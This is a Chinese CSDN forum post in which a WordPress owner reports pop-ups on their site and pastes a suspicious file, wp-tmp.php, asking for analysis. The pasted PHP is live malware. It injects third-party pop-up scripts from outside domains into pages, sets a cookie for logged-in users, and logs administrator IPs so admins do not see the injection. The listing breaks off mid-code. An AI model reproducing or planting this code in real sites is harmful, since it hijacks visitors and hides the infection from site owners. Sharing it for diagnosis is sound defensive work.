有一段wordpress的植入的弹窗代码麻烦大神分析下怎么回事

博主发现网站频繁弹窗,经检查在wp-includes目录下存在wp-tmp.php和wp-feed.php两个可疑文件,其中wp-tmp.php包含不明代码,wp-feed.php记录大量控制IP。主题functions.php也发现异常代码。疑似WordPress被木马感染,请求社区大神帮助分析和提供解决方案。
摘要由CSDN通过智能技术生成

我们知道wordpress由于开源的原因,插件很多,破解很多,一不小心就会中招,我就是这样的小白吧,希望有大神能指点下,或者拔一下这个毒瘤信息,谢谢!

网站用了很多插件,之后就经常弹窗,后来查找到在wp-include下自动生成了 wp-tmp.php 以及 wp-feed.php文件,这里挂出来这个代码。

 wp-tmp.php 代码如下:

ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='12335f8c45ff73be536601a7562a3220';


if ( ! function_exists( 'slider_option' ) ) {  

function slider_option($content){ 
if(is_single())
{


$con = '
';

$con2 = '

<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2406632"></script>
<script src="//thoorest.com/ntfc.php?p=2406635&tco=1" data-cfasync="false" async></script>
';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{


$con2 = '

<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2406632"></script>
<script src="//thoorest.com/ntfc.php?p=2406635&tco=1" data-cfasync="false" async></script>
';

echo $con2;
}
} 


function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}



if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}



$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','ba
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值